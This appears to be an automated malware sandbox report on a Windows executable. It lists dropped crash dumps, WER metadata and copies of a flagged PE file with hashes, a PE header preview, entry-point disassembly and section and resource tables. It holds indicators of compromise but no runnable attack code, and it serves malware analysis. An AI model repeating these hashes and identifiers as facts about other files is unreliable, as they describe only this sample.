                                                                                                                                                                                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.1.7.4.3.2.6.5.4.8.1.5.6.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.1.7.4.3.2.7.2.8.2.5.3.0.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.9.e.2.e.e.1.f.-.8.5.7.1.-.4.f.d.b.-.a.1.7.e.-.f.3.8.4.4.d.b.d.d.3.1.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.5.5.9.6.3.1.e.-.8.2.b.0.-.4.b.8.3.-.a.4.4.9.-.0.f.a.c.e.f.e.6.2.5.d.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.E.B.8.6...t.m.p...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.1.9.c.-.0.0.0.1.-.0.0.1.4.-.e.d.9.2.-.f.f.4.d.1.2.6.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.4.3.5.6.5.7.1.a.f.3.7.3.b.a.0.1.4.5.6.d.4.8.4.4.b.f.e.5.5.3.c.0.0.0.0.f.f.f.f.!.0.0.0.0.2.c.8.f.a.1.7.d.0.5.2.5.1.b.5.1.5.c.c.5.2.6.9.4.3.3.5.a.8.8.c.7.a.6.0.9.e.3.0.3.!.E.B.8.6...t.m.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.5./.
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:Mini DuMP crash report, 15 streams, Sun Jan 12 16:52:06 2025, 0x1205a4 type
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):44496
                                                                                                                                                                                                                                                Entropy (8bit):2.4985523581789506
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:6WxXk8LYOp1B1qYbUY+9aVYTmdy0zcF6bjEL9fhmGB9:XLf7B1qYa9a+6niijw9B
                                                                                                                                                                                                                                                MD5:AFCCD061EC28AC047E2FBDD717A44C9D
                                                                                                                                                                                                                                                SHA1:239874A035F6D6616EA06CDAC0D2E11916636E61
                                                                                                                                                                                                                                                SHA-256:0EF489345E782C544D84B730E2BA76DF2C5A937CCE0CF19ECB2D78FA40260431
                                                                                                                                                                                                                                                SHA-512:06EA1CD0A332FC7CF58BD6B878BCF3C32729E8C082B12D742AD0786ED8A6F1F66DB40236BBD738BA0DBA88B7B6976FF1DADF385F271154551B801F79F7F46D3F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:MDMP..a..... .......6.g............4...............H.......T...<.......d...,,..........`.......8...........T............?...n......................|...............................................................................eJ....... ......GenuineIntel............T...........2.g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):8386
                                                                                                                                                                                                                                                Entropy (8bit):3.6923354080923674
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:192:R6l7wVeJ4j6of6Yfq654EpgmfN94bupDH89b7Vsfhpm:R6lXJ86of6YC6fpgmfN9o7ufe
                                                                                                                                                                                                                                                MD5:CBAA97C7FCFE73739DCE683650E2DA17
                                                                                                                                                                                                                                                SHA1:0150D788F366085EBA32DFB7D535E08C1A5C91D1
                                                                                                                                                                                                                                                SHA-256:44A506DABC33DC21D2406306EBF07D049B8AC3140A15F8FDD55CFC6C02151E1A
                                                                                                                                                                                                                                                SHA-512:7499A81A0D960546D3FD9611CB490256C8ACD83C6F37D46900AB002696C0E607578C8EEB6D1CB8F5AA10C1A2320F76845B818A06A2214D3FACEE2E6EFC60A6AF
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.1.2.<./.P.i.d.
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4714
                                                                                                                                                                                                                                                Entropy (8bit):4.4712478039753085
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:48:cvIwWl8zsVJg77aI9daWpW8VYaKNYm8M4J6FO3FbC+q8vBFOVqCOMSvmd:uIjfvI7nb7V3JiUCKTsqCO9vmd
                                                                                                                                                                                                                                                MD5:24395E042B11575442D1665431870B08
                                                                                                                                                                                                                                                SHA1:C4D4B75F52B994914AF8F8DC83C455A245788B48
                                                                                                                                                                                                                                                SHA-256:986967E21E032CE00F7ED69C9C24296189E35B8CA5065AB001B0491FFACE2D03
                                                                                                                                                                                                                                                SHA-512:005229CFE6AFEF0621031A24A442D557E62D4FE6FB18CF37B347DBBB2C1747B67F49A356283496507EC748CE4CD53539FFE519DDEEFF3DFACB2557A41FD5025B
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="672954" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\L7GNkeVm5e.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):403968
                                                                                                                                                                                                                                                Entropy (8bit):6.686761413395804
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:Ro2KKJ9Uzzp69NgvCbewaeDZwq0K4gowWix4WlhBTSPY89CA2dPtcDB66Ngv73mt:VJQ6rEGEPipJSPincDcMm28I
                                                                                                                                                                                                                                                MD5:08494E6A1E788EA3259955A4524FDFEC
                                                                                                                                                                                                                                                SHA1:2C8FA17D05251B515CC52694335A88C7A609E303
                                                                                                                                                                                                                                                SHA-256:9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94
                                                                                                                                                                                                                                                SHA-512:A0EAE14B5AA2800F2D4E92E6735A9B3ACF6256C9DFD811DD5E9E16DF20B7DCB7911FA112AE0344A3D3DDF95A4610FBCDC729CD0F9746ED006E277D4E103482FF
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: NDWffRLk7z.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: g3toRYa6JE.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: lBb4XI4eGD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................Rich...........PE..L......f.................6...p...............P....@..........................................................................i..(........i...........................................................................P...............................text....4.......6.................. ..`.rdata..V"...P...$...:..............@..@.data....|...........^..............@....nosu....S.......H...t..............@....muwav..Z....`......................@....roxah.......p......................@..@.rsrc....i.......j..................@..@........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\L7GNkeVm5e.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):403968
                                                                                                                                                                                                                                                Entropy (8bit):6.686761413395804
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3072:Ro2KKJ9Uzzp69NgvCbewaeDZwq0K4gowWix4WlhBTSPY89CA2dPtcDB66Ngv73mt:VJQ6rEGEPipJSPincDcMm28I
                                                                                                                                                                                                                                                MD5:08494E6A1E788EA3259955A4524FDFEC
                                                                                                                                                                                                                                                SHA1:2C8FA17D05251B515CC52694335A88C7A609E303
                                                                                                                                                                                                                                                SHA-256:9EEE9D46E5EA0B25BD904760A998A54550AB3800666D01E27AA8FF52626ECE94
                                                                                                                                                                                                                                                SHA-512:A0EAE14B5AA2800F2D4E92E6735A9B3ACF6256C9DFD811DD5E9E16DF20B7DCB7911FA112AE0344A3D3DDF95A4610FBCDC729CD0F9746ED006E277D4E103482FF
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                                                Joe Sandbox View:
                                                                                                                                                                                                                                                • Filename: NDWffRLk7z.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: g3toRYa6JE.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                • Filename: lBb4XI4eGD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................................................Rich...........PE..L......f.................6...p...............P....@..........................................................................i..(........i...........................................................................P...............................text....4.......6.................. ..`.rdata..V"...P...$...:..............@..@.data....|...........^..............@....nosu....S.......H...t..............@....muwav..Z....`......................@....roxah.......p......................@..@.rsrc....i.......j..................@..@........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1835008
                                                                                                                                                                                                                                                Entropy (8bit):4.4214608001522695
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:eSvfpi6ceLP/9skLmb0OTrWSPHaJG8nAgeMZMMhA2fX4WABlEnNI0uhiTw:9vloTrW+EZMM6DFy+03w
                                                                                                                                                                                                                                                MD5:6380F69CB5E1527834C4D6E921E2ED6D
                                                                                                                                                                                                                                                SHA1:402929490DEEB5371DD4153CBC88E2D1AF9457F9
                                                                                                                                                                                                                                                SHA-256:F49B080C44DC9CBC07A58ED529D45B8FA9EAF7DAD203EE55A3986B477AF9B17F
                                                                                                                                                                                                                                                SHA-512:3504AE108BDD4D87EE1B6665F370B292AA2D073481B24AB60CD9317DFDD362201AC58DCA1A61D78AFC54D82292668EEC7CF18C3B45D34BD1631B98FDC20B1A98
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...P.e...............................................................................................................................................................................................................................................................................................................................................o.d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Entropy (8bit):6.8908277278882695
                                                                                                                                                                                                                                                TrID:
                                                                                                                                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                File name:L7GNkeVm5e.exe
                                                                                                                                                                                                                                                File size:467'968 bytes
                                                                                                                                                                                                                                                MD5:f7db525dd98ee5fbdc9c11d59b93985b
                                                                                                                                                                                                                                                SHA1:1d722eb6df789efffa180f73bc9f3799d91115f1
                                                                                                                                                                                                                                                SHA256:1385f8cf1b5f14beabab56b3208665cea34dd1933d4c6679cf1157287e4ec379
                                                                                                                                                                                                                                                SHA512:9a39080f0bbe6e941fb2e2e2ac827c9c1f6d84795984de1116b32e7deaf87f9a27bae5c0e00a42eee0b1813b9578fd3fe7a5b01cbc33d0cbdb1f00169c6796f4
                                                                                                                                                                                                                                                SSDEEP:6144:nTrkGci+k8x2itSrDQM6OX0WFfL7lC9ewMS3sQnmZ/dXJBi/9r:nTruFkM2f3zXBFfL7leewMJQmZhJgl
                                                                                                                                                                                                                                                TLSH:ECA4AE0266FDE9D4FBB78731AE3986A42A2FFC624E74624D31547B1F09763A1C522313
                                                                                                                                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........q4...g...g...g...g...g...g...g...g...g.Udg...g...g...g...g...g...g...g...g...gRich...g................PE..L.....0e...........
                                                                                                                                                                                                                                                Icon Hash:86c7c30b0f4e0d19
                                                                                                                                                                                                                                                Entrypoint:0x40153a
                                                                                                                                                                                                                                                Entrypoint Section:.text
                                                                                                                                                                                                                                                Digitally signed:false
                                                                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                Time Stamp:0x6530B7C3 [Thu Oct 19 04:59:47 2023 UTC]
                                                                                                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                                                                                                OS Version Major:5
                                                                                                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                                                                                                File Version Major:5
                                                                                                                                                                                                                                                File Version Minor:0
                                                                                                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                                                                                                Import Hash:b347e3571c18d9445a1ad9026f10528e
                                                                                                                                                                                                                                                Instruction
                                                                                                                                                                                                                                                call 00007FF76C6E6C8Fh
                                                                                                                                                                                                                                                jmp 00007FF76C6E332Dh
                                                                                                                                                                                                                                                mov edi, edi
                                                                                                                                                                                                                                                push ebp
                                                                                                                                                                                                                                                mov ebp, esp
                                                                                                                                                                                                                                                sub esp, 00000328h
                                                                                                                                                                                                                                                mov dword ptr [00456598h], eax
                                                                                                                                                                                                                                                mov dword ptr [00456594h], ecx
                                                                                                                                                                                                                                                mov dword ptr [00456590h], edx
                                                                                                                                                                                                                                                mov dword ptr [0045658Ch], ebx
                                                                                                                                                                                                                                                mov dword ptr [00456588h], esi
                                                                                                                                                                                                                                                mov dword ptr [00456584h], edi
                                                                                                                                                                                                                                                mov word ptr [004565B0h], ss
                                                                                                                                                                                                                                                mov word ptr [004565A4h], cs
                                                                                                                                                                                                                                                mov word ptr [00456580h], ds
                                                                                                                                                                                                                                                mov word ptr [0045657Ch], es
                                                                                                                                                                                                                                                mov word ptr [00456578h], fs
                                                                                                                                                                                                                                                mov word ptr [00456574h], gs
                                                                                                                                                                                                                                                pushfd
                                                                                                                                                                                                                                                pop dword ptr [004565A8h]
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+00h]
                                                                                                                                                                                                                                                mov dword ptr [0045659Ch], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp+04h]
                                                                                                                                                                                                                                                mov dword ptr [004565A0h], eax
                                                                                                                                                                                                                                                lea eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                                                mov dword ptr [004565ACh], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [ebp-00000320h]
                                                                                                                                                                                                                                                mov dword ptr [004564E8h], 00010001h
                                                                                                                                                                                                                                                mov eax, dword ptr [004565A0h]
                                                                                                                                                                                                                                                mov dword ptr [0045649Ch], eax
                                                                                                                                                                                                                                                mov dword ptr [00456490h], C0000409h
                                                                                                                                                                                                                                                mov dword ptr [00456494h], 00000001h
                                                                                                                                                                                                                                                mov eax, dword ptr [00455004h]
                                                                                                                                                                                                                                                mov dword ptr [ebp-00000328h], eax
                                                                                                                                                                                                                                                mov eax, dword ptr [00455008h]
                                                                                                                                                                                                                                                mov dword ptr [ebp-00000324h], eax
                                                                                                                                                                                                                                                call dword ptr [000000B0h]
                                                                                                                                                                                                                                                Programming Language:
                                                                                                                                                                                                                                                • [C++] VS2008 build 21022
                                                                                                                                                                                                                                                • [ASM] VS2008 build 21022
                                                                                                                                                                                                                                                • [ C ] VS2008 build 21022
                                                                                                                                                                                                                                                • [IMP] VS2005 build 50727
                                                                                                                                                                                                                                                • [RES] VS2008 build 21022
                                                                                                                                                                                                                                                • [LNK] VS2008 build 21022
                                                                                                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x53a6c0x3c.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xc50000x19750.rsrc
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x535e80x40.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x520000x19c.rdata
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                .text0x10000x5012c0x50200b2c23762042d21f6be851f5ae867b9f7False0.8431345066302652data7.541693666484268IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .rdata0x520000x23ae0x240070040de4e5fc9f0266fe48122edeebc4False0.375data5.542785759574896IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .data0x550000x67c080x16009ce6aa879b2f906e425eb18d768d1945False0.2878196022727273data2.9081953038543342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .vakolu0xbd0000x53e50x4800f9debe3f07be68533bf0295e3d2ba68aFalse0.002224392361111111data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .devuwi0xc30000x15a0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                .pogezal0xc40000xc0x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                .rsrc0xc50000x197500x1980016c80cbb07fba82957a6d15c52ec48beFalse0.4227270986519608data5.027713803262131IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                RT_CURSOR0xd5bb80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.31023454157782515
                                                                                                                                                                                                                                                RT_CURSOR0xd6a780x130Device independent bitmap graphic, 32 x 64 x 1, image size 00.7368421052631579
                                                                                                                                                                                                                                                RT_CURSOR0xd6ba80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.06130705394190871
                                                                                                                                                                                                                                                RT_ICON0xc59600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.8128997867803838
                                                                                                                                                                                                                                                RT_ICON0xc68080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.8592057761732852
                                                                                                                                                                                                                                                RT_ICON0xc70b00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.7811059907834101
                                                                                                                                                                                                                                                RT_ICON0xc77780x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.791907514450867
                                                                                                                                                                                                                                                RT_ICON0xc7ce00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 92160.8058091286307054
                                                                                                                                                                                                                                                RT_ICON0xca2880x988Device independent bitmap graphic, 24 x 48 x 32, image size 23040.8442622950819673
                                                                                                                                                                                                                                                RT_ICON0xcac100x468Device independent bitmap graphic, 16 x 32 x 32, image size 10240.8599290780141844
                                                                                                                                                                                                                                                RT_ICON0xcb0e00xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.3243603411513859
                                                                                                                                                                                                                                                RT_ICON0xcbf880x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.44765342960288806
                                                                                                                                                                                                                                                RT_ICON0xcc8300x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.5190092165898618
                                                                                                                                                                                                                                                RT_ICON0xccef80x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.536849710982659
                                                                                                                                                                                                                                                RT_ICON0xcd4600x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.28822701688555347
                                                                                                                                                                                                                                                RT_ICON0xce5080x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.289344262295082
                                                                                                                                                                                                                                                RT_ICON0xcee900x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.34131205673758863
                                                                                                                                                                                                                                                RT_ICON0xcf3600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 00.2785181236673774
                                                                                                                                                                                                                                                RT_ICON0xd02080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 00.36462093862815886
                                                                                                                                                                                                                                                RT_ICON0xd0ab00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 00.3790322580645161
                                                                                                                                                                                                                                                RT_ICON0xd11780x568Device independent bitmap graphic, 16 x 32 x 8, image size 00.36921965317919075
                                                                                                                                                                                                                                                RT_ICON0xd16e00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.2590248962655602
                                                                                                                                                                                                                                                RT_ICON0xd3c880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.274624765478424
                                                                                                                                                                                                                                                RT_ICON0xd4d300x988Device independent bitmap graphic, 24 x 48 x 32, image size 00.28647540983606556
                                                                                                                                                                                                                                                RT_ICON0xd56b80x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.3262411347517731
                                                                                                                                                                                                                                                RT_STRING0xd93300x59adata0.4309623430962343
                                                                                                                                                                                                                                                RT_STRING0xd98d00xfcdata0.5515873015873016
                                                                                                                                                                                                                                                RT_STRING0xd99d00x788data0.42012448132780084
                                                                                                                                                                                                                                                RT_STRING0xda1580x784data0.4287941787941788
                                                                                                                                                                                                                                                RT_STRING0xda8e00x726data0.42568306010928963
                                                                                                                                                                                                                                                RT_STRING0xdb0080x644data0.4389027431421446
                                                                                                                                                                                                                                                RT_STRING0xdb6500x6bcdata0.4274941995359629
                                                                                                                                                                                                                                                RT_STRING0xdbd100x7f2data0.41297935103244837
                                                                                                                                                                                                                                                RT_STRING0xdc5080x786data0.4221183800623053
                                                                                                                                                                                                                                                RT_STRING0xdcc900x5cedata0.43943472409152085
                                                                                                                                                                                                                                                RT_STRING0xdd2600x554data0.45234604105571846
                                                                                                                                                                                                                                                RT_STRING0xdd7b80x60cdata0.4412144702842377
                                                                                                                                                                                                                                                RT_STRING0xdddc80x81cdata0.41570327552986513
                                                                                                                                                                                                                                                RT_STRING0xde5e80x162data0.5169491525423728
                                                                                                                                                                                                                                                RT_ACCELERATOR0xd5b980x20data1.15625
                                                                                                                                                                                                                                                RT_GROUP_CURSOR0xd6a600x14data1.25
                                                                                                                                                                                                                                                RT_GROUP_CURSOR0xd91500x22data1.088235294117647
                                                                                                                                                                                                                                                RT_GROUP_ICON0xcb0780x68data0.7115384615384616
                                                                                                                                                                                                                                                RT_GROUP_ICON0xd5b200x76data0.6779661016949152
                                                                                                                                                                                                                                                RT_GROUP_ICON0xcf2f80x68data0.7115384615384616
                                                                                                                                                                                                                                                RT_VERSION0xd91780x1b8COM executable for DOS0.5772727272727273
                                                                                                                                                                                                                                                DLLImport
